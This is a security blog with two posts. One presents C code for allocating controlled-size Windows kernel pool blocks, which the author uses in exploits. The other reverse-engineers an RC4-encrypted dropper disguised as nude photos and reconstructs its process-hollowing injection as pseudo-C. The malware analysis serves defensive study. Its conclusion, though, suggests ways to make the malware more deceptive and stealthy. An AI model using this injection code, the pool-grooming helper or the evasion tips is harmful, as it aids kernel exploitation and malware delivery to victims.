Saturday, April 7, 2012

Allocating (nearly) arbitrary kernel pool blocks using win32k!NtUserCreateAcceleratorTable

Hopefully the title of this post is fairly self-explanatory. Being able to allocate blocks of a controlled size in this way has obvious implications in exploiting almost any kind of bug related to the kernel pool.
This technique is nice because you can allocate multiple controlled block sizes with no collateral overhead, leading to a cleaner pool 'massaging' process.

The relevant code from win32k.sys looks a little bit like this:

HACCEL NtUserCreateAcceleratorTable(LPACCEL paccel,int cAccel)
{
    ...
    CreateAcceleratorTable(paccel, cAccel * 6);
    ...
}

HANDLE CreateAcceleratorTable(LPACCEL paccel, int cAccel)
{
    ...
    HMAllocObject(gptiCurrent, 0, 8, cAccel + 12);
    ...
}


HMAllocObject will allocate an object of (cAccel + 12) bytes in the kernel pool via HeavyAllocPool, where cAccel has by this point already been multiplied by 6, and attach it to the current (calling) process by placing the handle in the current user handle table. Due to user handle limitations, you can only allocate a maximum of 65535 (0xffff) buffers using this technique. Windows 7 imposes a limit of 32767 (0x7FFF) bytes per allocation.
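The arithmetic above can be sketched as a pair of small helpers. This is only an illustration: the function and macro names are made up for this example, and it assumes the Windows 7 limit of 0x7FFF bytes applies to the full (cAccel * 6) + 12 request.

```c
#include <stddef.h>

#define ACCEL_ENTRY_SIZE   6u       /* multiplier seen in NtUserCreateAcceleratorTable */
#define ACCEL_HEADER_SIZE  12u      /* constant added in CreateAcceleratorTable */
#define ACCEL_MAX_ALLOC    0x7FFFu  /* Windows 7 per-allocation limit (assumed to cover the whole request) */

/* Bytes requested from HMAllocObject for a table of cAccel entries. */
size_t accel_alloc_size(size_t cAccel)
{
    return cAccel * ACCEL_ENTRY_SIZE + ACCEL_HEADER_SIZE;
}

/* Entry count that yields exactly `size` bytes, or -1 if that size is unreachable. */
long accel_count_for_size(size_t size)
{
    if (size <= ACCEL_HEADER_SIZE || size > ACCEL_MAX_ALLOC)
        return -1;
    if ((size - ACCEL_HEADER_SIZE) % ACCEL_ENTRY_SIZE != 0)
        return -1;
    return (long)((size - ACCEL_HEADER_SIZE) / ACCEL_ENTRY_SIZE);
}
```

In other words, only sizes of the form 12 + 6n are directly reachable, which is the reason for the "nearly" in the title.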

Allocations can be freed by using the NtUserDestroyAcceleratorTable system call (or the DestroyAcceleratorTable API call).

The code I use in my exploits is shown below. I generally compile it as a separate object and link it into those exploits that need it.

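#include <windows.h>
#include <stdlib.h>
#include <string.h>

#pragma comment(lib,"user32.lib")

/* Returns (HANDLE)-1 if the requested size cannot be produced, or
   whatever CreateAcceleratorTable returns (NULL on failure). */
HANDLE PoolAllocViaAccelTable(DWORD count)
{
    DWORD d;
    HANDLE ret;
    char *buff;

    /* count must be 12 + (n * 6) with n >= 1 */
    if(count <= 12)
    {
        return((HANDLE)-1);
    }

    d = (count - 12);

    if(d % 6 != 0)
    {
        /* Cannot allocate this amount directly */
        return((HANDLE)-1);
    }

    buff = (char *) malloc(count + 8);

    if(buff == NULL)
    {
        return((HANDLE)-1);
    }

    /* Zero the whole buffer, including the 8 bytes of slack */
    memset(buff, 0x0, count + 8);

    ret = (HANDLE) CreateAcceleratorTable((LPACCEL) buff, (int)(d / 6));

    free(buff);

    return(ret);
}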

Monday, July 25, 2011

Malware: Reversing "Ashley's Nude Pictures.exe"

1 Introduction

The following is a disassembly and reverse engineering session of a malware sample[1] which was found being spammed to various social forums. The poster claimed that the file contained nude photos of his sister obtained while "fixing her laptop".

Given that the vast majority of executables distributed in this way turn out to be malicious in nature, I uploaded it to VirusTotal, with mixed results.

Out of all the anti-virus programs on VirusTotal, only Avast versions 4 and 5 detected the sample as malicious, both identifying it as a version of ProRAT[2]. However, even a cursory glance at the import table of this binary shows that it is neither a fully-fledged RAT nor has it been packed with any traditional packer (which could otherwise significantly skew detection results).

Intrigued by this I decided to investigate the binary further.

2 First Pass Information

When I first open up a binary in IDA, the first thing I will often do is check out the string and import tables. There are a couple of reasons for doing this.

First, a binary may give a lot of information away via these tables. String data can often be used to pinpoint the invocation of various operations that we want to trace or intercept, such as file operations, pop-up boxes etc., and import data will tell us what external functions a binary uses and thus what operations it's equipped to carry out.

Secondly, we can often infer a lot of information simply from the state of these tables. Packed or obfuscated binaries, such as many instances of malware, will often encrypt strings and either mangle or completely forgo the import table.
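To make the "state of the string table" idea a little more concrete, here is a minimal sketch of the kind of scan a strings-style tool performs: it counts runs of printable ASCII bytes in a buffer. The function name is hypothetical and this is not how IDA builds its strings window; a file with very few such runs for its size is simply a hint that its strings may be encrypted or packed.

```c
#include <stddef.h>

/* Counts runs of at least min_len consecutive printable ASCII bytes.
   min_len is expected to be 1 or more. */
size_t count_printable_runs(const unsigned char *buf, size_t len, size_t min_len)
{
    size_t runs = 0, run = 0, i;

    for (i = 0; i < len; i++) {
        if (buf[i] >= 0x20 && buf[i] <= 0x7E) {
            run++;
        } else {
            if (run >= min_len)
                runs++;
            run = 0;
        }
    }
    if (run >= min_len)   /* a run may end at the last byte of the buffer */
        runs++;
    return runs;
}
```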

2.1 String Table

In the case of this particular binary the string table isn't too enlightening in terms of what the program actually does, although there are a few informative tidbits.

../../../../gcc-4.4.1/libgcc/../gcc/config/i386/cygming-shar

Couldn't retrieve name of GCClib shared data atom

-GCCLIBCYGMING-EH-TDM1-SJLJ-GTHR-MINGW32
In particular, the strings above show us that the binary was compiled by gcc from the mingw (http://www.mingw.org) suite.

Another interesting set of strings contain the names of Microsoft Windows versions (2000, XP, Vista etc). Given that the purported purpose of this binary is to be a self-extracting archive, what use would such information be to it?

2.2 Import Directory

The import table sheds some light on this question. We can immediately see that the binary imports the Windows API function GetVersionA, which obtains the version of the operating system the binary is running under. This would seem to suggest that the binary obtains the current operating system and checks to make sure it can run under it.

Beyond this there are no really suspicious functions being imported here, other than the partial giveaway of the Windows API function GetProcAddress. This function indicates that the binary is performing runtime DLL linking in addition to the compile-time linking displayed by the import table. So at the very least there is more to this binary than meets the eye.

Additionally, there are the Windows API functions FindResourceA, LoadResource and LockResource. These functions are used to manipulate resources, such as icons, images and GUI components, within the PE executable. With this in mind, I decided to explore the resource section of the binary.

2.3 The Resource Section

By opening up the binary file in PE Explorer we can immediately see that it has two resource files embedded within it.

The first is named X and is 40448 bytes long. The other is named Z and is 15 bytes long.

As it is plausible, although somewhat unlikely, for a supposed self-extracting archive to store its files in the resource section, I dumped out the longer file to analyse it. However, immediately upon examining it in a hex editor we can tell that it is obviously not a standard image file, but rather some seemingly mangled data.
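The "is this a standard image file?" check done by eye in the hex editor amounts to looking at the first few bytes. A minimal sketch of that check, covering only four common formats and using a hypothetical function name, might be:

```c
#include <stddef.h>
#include <string.h>

/* Returns a short format name if buf starts with a well-known image
   signature, or NULL if none of the signatures match. */
const char *image_format_from_magic(const unsigned char *buf, size_t len)
{
    static const unsigned char png[] = { 0x89, 'P', 'N', 'G', 0x0D, 0x0A, 0x1A, 0x0A };
    static const unsigned char jpg[] = { 0xFF, 0xD8, 0xFF };

    if (len >= sizeof(png) && memcmp(buf, png, sizeof(png)) == 0)
        return "png";
    if (len >= sizeof(jpg) && memcmp(buf, jpg, sizeof(jpg)) == 0)
        return "jpeg";
    if (len >= 4 && memcmp(buf, "GIF8", 4) == 0)
        return "gif";
    if (len >= 2 && memcmp(buf, "BM", 2) == 0)
        return "bmp";
    return NULL;
}
```

A NULL result for the dumped X resource is consistent with the data being encrypted or otherwise transformed rather than stored as a plain picture.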

Potentially this could be a compressed image file, although this would be somewhat odd as most photo formats (e.g. JPEG) already use compression by default.

3 Disassembly


3.1 Dead Code

One of the first noticeable things about this binary is the amount of 'dead' code it contains. When code is referred to as 'dead', it means that parts of the program, while valid code, are not actually executed at any point via the main program logic.

IDA Pro generally does a very good job of identifying functions, although it can sometimes miss functions inserted into call tables such as in Windows drivers and IAT and SSDT hooks (this is because, to avoid confusion, IDA only marks as a function code it can find a path to from the original program entry point).

In this binary there are a number of obvious functions that IDA does not recognize. On further inspection it becomes clear that there is no visible call path to these functions from the application's entry point. As a lot of these 'dead' functions go on to call Windows API functions, I broke on the following addresses and ran the program in order to verify whether or not these supposedly dead functions were being called via some path that IDA was unable to recognise:
MapViewOfFile
CreateFileA
CreateFileMappingA
GetVersionEx
None of the above functions were called during a normal program execution, leading us to believe that the functions that call these procedures are in fact dead code.

With this in mind we have to ask ourselves why this code has been included but is not executed by any normally invoked code path.

There are a number of potential reasons for this. One very good reason is that, due to how the spreader of this malware wanted it to be perceived, it should at least pretend to act like a self-extracting zip file. Any executable that acts in this way would need to call functions such as CreateFile, and therefore having them in its import table, even if it doesn't need to call them, would help lend credibility to the program.

Another potentially good reason for this is that the author of the malware wanted to be able to bypass anti-virus scanners. One way to do this is to add extra code to the binary so as to eliminate any signatures that anti-virus programs may be picking up on.

In any case, the code in question was not executed during a normal program run and was thus excluded from my analysis.

3.2 The Resource Extractor

After some fairly simple code tracing from the entry point, the first function of real note that we come to is what I've nicknamed the Resource Extractor and which can be found starting at address 00402028.

Fairly linear in structure, this routine begins by creating a mutex named sdcascdasds and then proceeds to use a set of standard functions - calling in turn FindResourceA, LoadResource and LockResource on the embedded resources X and Z.

The only interesting code in this function is the continual calls to GetModuleFileNameA and LocalAlloc. These happen in loops of roughly 600,000 iterations (the counter is compared against 927BEh) and are probably added to bypass anti-virus heuristics in some way. One example of such a loop is given below:
.text:00402088 loc_402088:
.text:00402088     mov     [esp+148h+var_140], 0
.text:00402090     mov     [esp+148h+var_144], 0
.text:00402098     mov     [esp+148h+var_148], 0
.text:0040209F     call    GetModuleFileNameA
.text:004020A4     sub     esp, 0Ch        ; uFlags
.text:004020A7     mov     [esp+148h+var_144], 0Ch
.text:004020AF     mov     [esp+148h+var_148], 0
.text:004020B6     call    LocalAlloc
.text:004020BB     sub     esp, 8          ; hModule
.text:004020BE     mov     [esp+148h+var_140], 0
.text:004020C6     mov     [esp+148h+var_144], 0
.text:004020CE     mov     [esp+148h+var_148], 0
.text:004020D5     call    GetModuleFileNameA
.text:004020DA     sub     esp, 0Ch        ; hModule
.text:004020DD     inc     ebx
.text:004020DE     cmp     ebx, 927BEh
.text:004020E4     jnz     short loc_402088
Having loaded the embedded resources into memory, it pushes their start addresses onto the stack and calls the function at 00401328. If we look at the order in which the values are copied onto the stack we can surmise that this function has a prototype a little something like:
function(void *X_data, void *Z_data, int X_len, int Z_len);
If we cheat a little bit and look at the code after the call to this function, we can see that the result (stored in eax) is used as a parameter to the next function at address 00401CD0. By peeking ahead a bit more we can see this function in turn perform the following comparisons on this data:
00401D56    cmp    word ptr [ebx], 5A4Dh
...
00401D6F    cmp    dword ptr [eax], 4550h
The first compare is checking for the bytes "MZ" at the start of the data, the other is looking for the bytes "PE" at a certain offset into the data. Both of these are dead giveaways that this function is expecting a PE executable file.
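For reference, the two comparisons correspond to a check along the following lines. This is a sketch rather than a reconstruction of the sample's code: the function name is hypothetical, and the "certain offset" is taken to be the standard e_lfanew field at offset 3Ch of the DOS header.

```c
#include <stddef.h>
#include <stdint.h>

/* Little-endian reads, done byte by byte so the code does not depend on
   the host's alignment rules or byte order. */
static uint16_t rd16(const unsigned char *p)
{
    return (uint16_t)(p[0] | (p[1] << 8));
}

static uint32_t rd32(const unsigned char *p)
{
    return (uint32_t)p[0] | ((uint32_t)p[1] << 8) |
           ((uint32_t)p[2] << 16) | ((uint32_t)p[3] << 24);
}

/* Returns 1 if buf has "MZ" at offset 0 and "PE\0\0" at e_lfanew, else 0. */
int looks_like_pe(const unsigned char *buf, size_t len)
{
    uint32_t e_lfanew;

    if (len < 0x40 || rd16(buf) != 0x5A4D)      /* cmp word ptr [ebx], 5A4Dh */
        return 0;

    e_lfanew = rd32(buf + 0x3C);                /* offset of the NT headers */
    if (e_lfanew > len || len - e_lfanew < 4)
        return 0;

    return rd32(buf + e_lfanew) == 0x00004550;  /* cmp dword ptr [eax], 4550h */
}
```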

Therefore, we can expect that the function at 00401328 will most likely decrypt the data in the X resource leaving it as a PE executable.

3.3 The Decryption Routine (00401328)

From an initial analysis of this function, we can immediately tell that it's a lot more involved than what we've seen up until now. There are no function calls from this function, only a series of loops and involved data copies. This means that rather than simply trace function parameters and return values as we did in the last function, we're going to actually have to trace through the logic to see what it does.

Given what we learned in the previous function, it seems reasonable to assume that this function might perform some kind of decryption, although we won't know until we work our way through.
function:
    push    ebp
    mov     ebp, esp
    push    edi
    push    esi
    push    ebx
    sub     esp, 404h
    xor     eax, eax
    lea     esi, [ebp+var_40C]
This initial block of code is very standard. It saves the frame pointer on the stack via the push instruction, copies esp into ebp to create a new frame and then saves the values of edi, esi and ebx.

After doing this it subtracts 1028 (404h) bytes from esp - this essentially gives this function 1028 bytes of local (stack) variable space to play with.

To finish, this block sets eax to zero and loads the address of a stack variable into the esi register.
.text:0040133C loc_40133C:
.text:0040133C     mov     [esi+eax*4], eax
.text:0040133F     inc     eax
.text:00401340     cmp     eax, 100h
.text:00401345     jnz     short loc_40133C
.text:00401347     xor     ebx, ebx
.text:00401349     xor     ecx, ecx
.text:0040134B     nop
This next block is really rather simple and we can tell immediately that it's a loop, counting from 0 to 255 (< 256 or 100h).

The loop copies the value of eax (which enters the loop set to zero) into the variable pointed to by esi at the offset [eax * 4].

If we were to convert this simply into C, it may look a little something like this:
int table[256];

for(i = 0; i < 256; i++)
{
    table[i] = i;
}
Let's move on to the next block of code.
.text:0040134C loc_40134C:
.text:0040134C     mov     edi, [esi+ecx*4]
.text:0040134F     add     ebx, edi
.text:00401351     mov     [ebp+var_410], ebx
.text:00401357     mov     eax, ecx
.text:00401359     xor     edx, edx
.text:0040135B     div     [ebp+arg_C]
.text:0040135E     mov     ebx, [ebp+arg_4]
.text:00401361     movzx   eax, byte ptr [ebx+edx]
.text:00401365     add     eax, [ebp+var_410]
.text:0040136B     mov     ebx, 0ECh
.text:00401370     cdq
.text:00401371     idiv    ebx
.text:00401373     lea     ebx, [edx+14h]
.text:00401376     mov     eax, [ebp+ebx*4+var_40C]
.text:0040137D     mov     [esi+ecx*4], eax
.text:00401380     and     edi, 0FFh
.text:00401386     mov     [ebp+ebx*4+var_40C], edi
.text:0040138D     inc     ecx
.text:0040138E     cmp     ecx, 100h
.text:00401394     jnz     short loc_40134C ; loop
.text:00401396     mov     eax, [ebp+arg_8]
.text:00401399     test    eax, eax
.text:0040139B     jz      short loc_4013FF
.text:0040139D     xor     esi, esi
.text:0040139F     nop
Again, this is a basic loop, which we can tell from the two instructions at 0040138E and 00401394.
The loop begins by retrieving data from the same table that was manipulated in the previous loop (its address is held in esi). The index and loop counter is in ecx.
This retrieved value is added to ebx, which enters the loop set to zero, and stored in a stack variable.
 
The next sequence starting at 00401357 is a good example of how modulo maths is executed at the assembly level.

A good example of a use of modular maths would be the following:
int arraylen = 400;
char array[arraylen+3];
int index = 600;

array[index % arraylen] = 1;
In C the expression index % arraylen divides index by arraylen and returns the remainder.

In our example, 400 goes into 600 once with 200 left over, so our code would be the equivalent of:
array[200] = 1;
At the assembly level this maths is performed by the div instruction.
.text:00401357     mov     eax, ecx
.text:00401359     xor     edx, edx
.text:0040135B     div     [ebp+arg_C]
.text:0040135E     mov     ebx, [ebp+arg_4]
.text:00401361     movzx   eax, byte ptr [ebx+edx]
Here we see ecx, the loop counter, being copied into eax and edx being set to zero. The following div instruction causes eax to be divided by the fourth function argument, which we know to be the length of the data in the Z resource. This causes the quotient (the number of times that length goes into ecx) to be stored in eax, and the remainder to be stored in edx.

edx is then used as an index when copying data from the second function argument.

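In C, the two loops above might look a little something like this:
unsigned int i;
unsigned int table[256];
unsigned int c;
unsigned int d = 0;

/* first loop: fill the table with 0..255 */
for(i = 0; i < 256; i++)
{
    table[i] = i;
}

/* second loop: shuffle the table using the key bytes from the Z resource */
for(i = 0; i < 256; i++)
{
        c = table[i];

        d += c;

        /* the disassembly reduces with 0ECh and then adds 14h here,
           where textbook ARC4 would reduce modulo 256 */
        d = ((d + Z_data[i % Z_len]) % 0xEC) + 0x14;

        table[i] = table[d];
        table[d] = c & 0xFF;
}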
To anyone even vaguely interested in or exposed to cryptography this should be starting to look somewhat familiar - what we are seeing here is basically the key initialization for an ARC4 implementation. If this is correct, then by setting a breakpoint at 00401402 we should see a 40448 byte PE executable file starting at the address held in eax.

As we can see in the screenshot, our initial analysis was correct and we can see the PE executable file data starting at address 00409104.
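For comparison, a textbook ARC4 routine is sketched below: the key scheduling loop followed by the keystream loop, applied to a buffer in place. This is the standard algorithm, not a byte-for-byte reconstruction of the function at 00401328; note that the disassembly above reduces its index with 0ECh and adds 14h where the textbook version reduces modulo 256, so the sample's routine may differ in detail. The name rc4_crypt is chosen for this example only.

```c
#include <assert.h>
#include <stddef.h>

/* Textbook ARC4 applied in place. Encryption and decryption are the
   same operation, so calling it twice with the same key restores data. */
void rc4_crypt(const unsigned char *key, size_t key_len,
               unsigned char *data, size_t data_len)
{
    unsigned char S[256], tmp;
    size_t i, j = 0, n;

    assert(key_len > 0);

    /* Key-scheduling algorithm (KSA) */
    for (i = 0; i < 256; i++)
        S[i] = (unsigned char)i;
    for (i = 0; i < 256; i++) {
        j = (j + S[i] + key[i % key_len]) % 256;
        tmp = S[i]; S[i] = S[j]; S[j] = tmp;
    }

    /* Pseudo-random generation algorithm (PRGA) */
    i = j = 0;
    for (n = 0; n < data_len; n++) {
        i = (i + 1) % 256;
        j = (j + S[i]) % 256;
        tmp = S[i]; S[i] = S[j]; S[j] = tmp;
        data[n] ^= S[(S[i] + S[j]) % 256];
    }
}
```

With the 15 byte Z resource as the key and the X resource as the data, a routine of this shape is what would turn the mangled bytes back into an executable, assuming the sample followed the textbook algorithm exactly.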

In order to facilitate obtaining this second stage payload, I wrote a short script[3] for Immunity Debugger which dumps a specified number of bytes from a given address into an output file. The screenshot below shows this script in use.

As we know from the previous function, this decrypted data is now passed as a parameter to the function at 00401CD0.

3.4 Execution and Injection

If anything, this function is even more linear than the resource extraction routine, and it uses the same heuristics dodging/obfuscation loop as before. By analyzing the parameters pushed on the stack before this function is called we can determine that it has a function definition something like:
void exec_inject(char *filename, void *decrypted_exe)
As noted above, it begins by performing the checks for the bytes "MZ" and "PE" and then begins a series of calls to GetProcAddress(GetModuleHandleA("XXXX"), "YYYY");

As we know, the GetProcAddress Windows API call obtains the addresses of other functions when given a handle to a module and the name of the function.

This program uses GetProcAddress to get the addresses of the following functions:
CreateProcessA
NtUnmapViewOfSection
VirtualAllocEx
NtWriteVirtualMemory
GetThreadContext
NtSetContextThread
ResumeThread
After having resolved the addresses of these functions, the program goes on to call them in turn. To make sense of this code, let's go through it one function call at a time.

The program first creates a new instance of itself by passing its own module file name (stored in esi) as the second argument to CreateProcessA.
CreateProcessA(0,"Ashley's Nude Pictures.exe", 0,0,0,4,0,0,&sd,&procinfo);
The trick here is that by passing the flags as 00000004 (CREATE_SUSPENDED), the process is created in a suspended state, meaning that it will not start running until ResumeThread is called on it.

We know that the NT PE headers are in eax, so [eax] refers to the member at +0 bytes (the first member). Therefore the call to NtUnmapViewOfSection looks like this:
NtUnmapViewOfSection(procinfo->handle, nthdrs->OPTIONAL_HEADER.ImageBase);
Having unmapped the memory at the second stage payload's image base, the process is now free to reallocate that memory using VirtualAllocEx:
VirtualAllocEx(procinfo->handle, nthdrs->OPTIONAL_HEADER.ImageBase, nthdrs->OPTIONAL_HEADER.SizeOfImage, 0x3000, 0x40);
And then copy the second stage payload's headers into the same memory space:
NtWriteVirtualMemory(procinfo->handle, nthdrs->OPTIONAL_HEADER.ImageBase, decrypted_exe, nthdrs->OPTIONAL_HEADER.SizeOfHeaders, 0);
Next we come to the following loop:
.text:00401F7D loc_401F7D:
.text:00401F7D     mov     eax, ds:dword_407008
.text:00401F82     mov     eax, [eax+3Ch]
.text:00401F85     lea     eax, [edi+eax+0F8h]
.text:00401F8C     lea     eax, [ebx+eax]
.text:00401F8F     mov     ds:dword_407010, eax
.text:00401F94     mov     [esp+3E0h+var_3D0], 0
.text:00401F9C     mov     ecx, [eax+10h]
.text:00401F9F     mov     [esp+3E0h+var_3D4], ecx
.text:00401FA3     mov     ecx, [eax+14h]
.text:00401FA6     add     ecx, ebx
.text:00401FA8     mov     [esp+3E0h+var_3D8], ecx
.text:00401FAC     mov     eax, [eax+0Ch]
.text:00401FAF     add     eax, [edx+34h]
.text:00401FB2     mov     [esp+3E0h+var_3DC], eax
.text:00401FB6     mov     eax, [ebp+var_28]
.text:00401FB9     mov     [esp+3E0h+var_3E0], eax
.text:00401FBC     call    [ebp+NTWriteVirtualMemory]
.text:00401FC2     sub     esp, 14h
.text:00401FC5     inc     esi
.text:00401FC6     mov     edx, ds:dword_40700C
.text:00401FCC     add     edi, 28h
.text:00401FCF     movzx   eax, word ptr [edx+6]
.text:00401FD3     cmp     eax, esi
.text:00401FD5     jg      short loc_401F7D
At first view the code here appears to be a nightmare. We can see that it's referencing decrypted_exe (stored in dword_407008) and the IMAGE_NT_HEADERS (stored in dword_40700C). We can tell that the loop counter is stored in esi and that the loop is only entered if nthdrs->FileHeader.NumberOfSections is greater than zero. Usually this kind of assembly logic is representative of a for or while loop in C of the type:
while(i < nthdrs->FileHeader.NumberOfSections)
{
    ...
}
The second clue is that at each loop iteration the offset held in edi is being incremented by 40 (28h) bytes, which just happens to be sizeof(IMAGE_SECTION_HEADER).

From this we can surmise that this loop is traversing the section headers and, as we can see from the assembly, copying and manipulating data from within the structures IMAGE_SECTION_HEADER, IMAGE_NT_HEADERS and IMAGE_DOS_HEADER.

Usually it would be an absolute nightmare to count offsets into structures to find out what members each assembly operation is accessing. Luckily IDA allows us to cut right through this.

By adding standard structures from IDA's Structures tab, highlighting individual offsets and hitting the hotkey t, we are able to select a representative structure definition and voilà - the correct member for that offset is calculated and displayed directly in the disassembly.

Looking at the IDA screenshot we can already see that the code is massively improved - suddenly we can tell exactly what the code is doing.

Armed with the correct member names we can quickly convert all of the preceding code into pseudo-C:
PIMAGE_DOS_HEADER doshdr = decrypted_exe;
PIMAGE_NT_HEADERS nthdrs = decrypted_exe + doshdr->e_lfanew;
PPROCESS_INFORMATION procinfo;

CreateProcessA(0,"Ashley's Nude Pictures.exe", 0,0,0,4,0,0,&hu,&procinfo);

NtUnmapViewOfSection(procinfo->hProcess, nthdrs->OPTIONAL_HEADER.ImageBase);

VirtualAllocEx(procinfo->hProcess, nthdrs->OPTIONAL_HEADER.ImageBase, nthdrs->OPTIONAL_HEADER.SizeOfImage, 0x3000, 0x40);

NtWriteVirtualMemory(procinfo->hProcess, nthdrs->OPTIONAL_HEADER.ImageBase, decrypted_exe, nthdrs->OPTIONAL_HEADER.SizeOfHeaders, 0);

int offset = 0;
int i = 0;

while(i < nthdrs->FileHeader.NumberOfSections)
{
    PIMAGE_SECTION_HEADER shdr;

    shdr = decrypted_exe + (doshdr->e_lfanew + sizeof(IMAGE_NT_HEADERS) + offset);

    NtWriteVirtualMemory(procinfo->hProcess, shdr->VirtualAddress + nthdrs->OPTIONAL_HEADER.ImageBase , decrypted_exe + shdr->PointerToRawData, shdr->SizeOfRawData, 0);

    offset += 40;
    i++;
}
Essentially this loop is going through the section headers one by one and copying the section data into the new process at the correct address.
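The same walk can be written against a raw buffer without any Windows headers, which makes the offsets seen in the disassembly (0F8h, 28h, +0Ch, +10h, +14h and +6) explicit. The sketch below only lists what would be copied for each section. The struct and function names are made up for this example, and like the sample it assumes a 32-bit image whose section headers start 0F8h bytes after the NT headers.

```c
#include <stddef.h>
#include <stdint.h>

#define NT_HEADERS32_SIZE   0xF8u  /* sizeof(IMAGE_NT_HEADERS), 32-bit image */
#define SECTION_HEADER_SIZE 0x28u  /* sizeof(IMAGE_SECTION_HEADER) */

struct section_copy {
    uint32_t virtual_address;      /* RVA to write to (add ImageBase) */
    uint32_t size_of_raw_data;     /* number of bytes to copy */
    uint32_t pointer_to_raw_data;  /* offset of the bytes inside the file */
};

static uint16_t rd16(const unsigned char *p)
{
    return (uint16_t)(p[0] | (p[1] << 8));
}

static uint32_t rd32(const unsigned char *p)
{
    return (uint32_t)p[0] | ((uint32_t)p[1] << 8) |
           ((uint32_t)p[2] << 16) | ((uint32_t)p[3] << 24);
}

/* Fills out[] with up to max_out entries and returns how many were
   written, or -1 if the headers do not fit inside the buffer. */
int list_section_copies(const unsigned char *pe, size_t len,
                        struct section_copy *out, int max_out)
{
    uint32_t e_lfanew;
    uint16_t count;
    size_t first, i;

    if (len < 0x40)
        return -1;
    e_lfanew = rd32(pe + 0x3C);
    if (e_lfanew > len || len - e_lfanew < NT_HEADERS32_SIZE)
        return -1;

    count = rd16(pe + e_lfanew + 6);            /* FileHeader.NumberOfSections */
    first = (size_t)e_lfanew + NT_HEADERS32_SIZE;
    if ((len - first) / SECTION_HEADER_SIZE < count)
        return -1;

    for (i = 0; i < count && (int)i < max_out; i++) {
        const unsigned char *sh = pe + first + i * SECTION_HEADER_SIZE;
        out[i].virtual_address     = rd32(sh + 0x0C);
        out[i].size_of_raw_data    = rd32(sh + 0x10);
        out[i].pointer_to_raw_data = rd32(sh + 0x14);
    }
    return (int)i;
}
```

Each entry maps directly onto one NtWriteVirtualMemory call in the loop: the destination is ImageBase plus virtual_address, the source is the start of the buffer plus pointer_to_raw_data, and the length is size_of_raw_data.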
GetThreadContext(procinfo->hThread, &context);

context.Eax = IMAGE_NT_HEADERS.OptionalHeader.AddressOfEntryPoint + IMAGE_NT_HEADERS.OptionalHeader.ImageBase;

NtSetContextThread(procinfo->hThread, &context);
Next, the GetThreadContext and NtSetContextThread functions are used to first obtain the thread's context (register set), modify eax to point to the new entry point (calculated as IMAGE_NT_HEADERS.OptionalHeader.AddressOfEntryPoint + IMAGE_NT_HEADERS.OptionalHeader.ImageBase) and commit the new context back to the process' main thread.

Finally the ResumeThread function is called to resume the new process and thereby launch a malicious executable without ever having to write the file to disk, a technique sometimes referred to as Nebbett's Shuttle.
ResumeThread(procinfo->hThread);
4 Conclusions

To conclude, this sample is taking an RC4 encrypted binary and an RC4 key from its resource section, using the key to decrypt the binary and using Nebbett's Shuttle to execute this binary in a somewhat stealthy fashion.

We can consider this sample to be a kind of crypter/dropper using very similar techniques to those seen in VBInject/VBCrypt/RunPE[4], albeit written in C++ rather than Visual Basic.

The large amount of dead code in this sample leads me to believe it's not a commercial or widely distributed product. I tend to believe that the attacker constructed it out of scraps of source code and example snippets. Often when an inexperienced programmer is manipulating code he doesn't understand he will be loath to remove sections for fear of breaking his program.

It follows that the attacker/spreader built this program, possibly out of scraps of sample and example code before compiling with the freeware compiler mingw in order to hide the execution of a more common and/or commercial malware, although we will only find this out for sure upon analysing the second stage executable.

Below are a few ideas of how the author could have potentially improved this malware:

The first and easiest way to improve this malware would have been to use a correct icon for the program. Using an icon corresponding to a WinZip self-extracting archive, for example, would have lent an air of authenticity to the program.

Taking this further, the attacker could have added functionality for the program to dump out actual photo files to the hard disk, only performing the exe injection attack at the end.

The logical conclusion of this would be to name the file something like archive.zip.exe, use a correct zipfile icon and have the program emulate the Windows zipfile extraction wizard. Although this may not help with foiling reverse engineering of the file, it would probably increase the malware's success rate dramatically.

A better alternative to executing a second, suspended, instance of the malware before loading the second stage exe over the top would be to relocate the second stage exe and write it into local VirtualAlloc'd memory before transferring control to the new entry point. This is the technique currently used by cutting-edge malware such as Zeus when performing non-PIC remote process code injection without DLLs and I think it would work just as well within a local process when wanting to perform stealth process execution.

What I found most interesting was that a large number of anti-virus products did not detect this malware at all, and those that did detect it got it completely wrong. I therefore guess you could label this a "zero-day" (albeit extremely lame) malware sample.

In the next few weeks (work, life and phases of the moon permitting) I hope to go on to analyze the second stage payload and if I'm successful I'll post the results up here.

5 References
[1] https://sites.google.com/site/ushirokesa/files/stash.zip?attredirects=0&d=1
[2] http://www.prorat.net/main.php?language=english
[3] https://sites.google.com/site/ushirokesa/files/dumptofile.py?attredirects=0&d=1
[4] http://interestingmalware.blogspot.com/2010/07/unpacking-vbinjectvbcryptrunpe.html